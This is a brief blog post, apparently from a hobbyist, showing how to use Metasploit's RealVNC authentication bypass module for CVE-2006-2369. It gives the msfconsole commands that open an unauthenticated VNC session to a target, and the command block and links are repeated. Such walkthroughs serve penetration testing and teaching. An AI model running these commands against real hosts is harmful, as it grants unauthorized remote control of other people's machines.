Metasploit's RealVNC authentication bypass module for CVE-2006-2369 is pretty fun because it's one of those that is way too easy. If a victim has a RealVNC server which is earlier than 4.1.2, or a LibVNCServer VNC server earlier than 0.8.2, a customized VNC client can send 'Type 1 - None' as the authentication type and completely bypass authentication. Metasploit does this for you.
This vulnerability was discovered by Steve Wiseman by accident while coding his own VNC software, so that's a fun fact. This is of course a very old vuln, but still exists out there, unfortunately. Here are the commands to exploit using msfconsole:
use auxiliary/admin/vnc/realvnc_41_bypass
show options
set autovnc true
set rhost <target-victim>
run
show options
set autovnc true
set rhost <target-victim>
run
At this point, Metasploit should automatically launch a VNC client and remote to the host while bypassing authentication. Fun stuff.
Links:
http://www.tenable.com/plugins/index.php?view=single&id=21564
https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS
http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/
http://www.tenable.com/plugins/index.php?view=single&id=21564
https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS
http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/
No comments:
Post a Comment
Spammy/foul language comments or those with an explicit avatar will be tossed in a 55 gallon drum and a match thrown in after them. (Oooo, now I can warm my hands!!)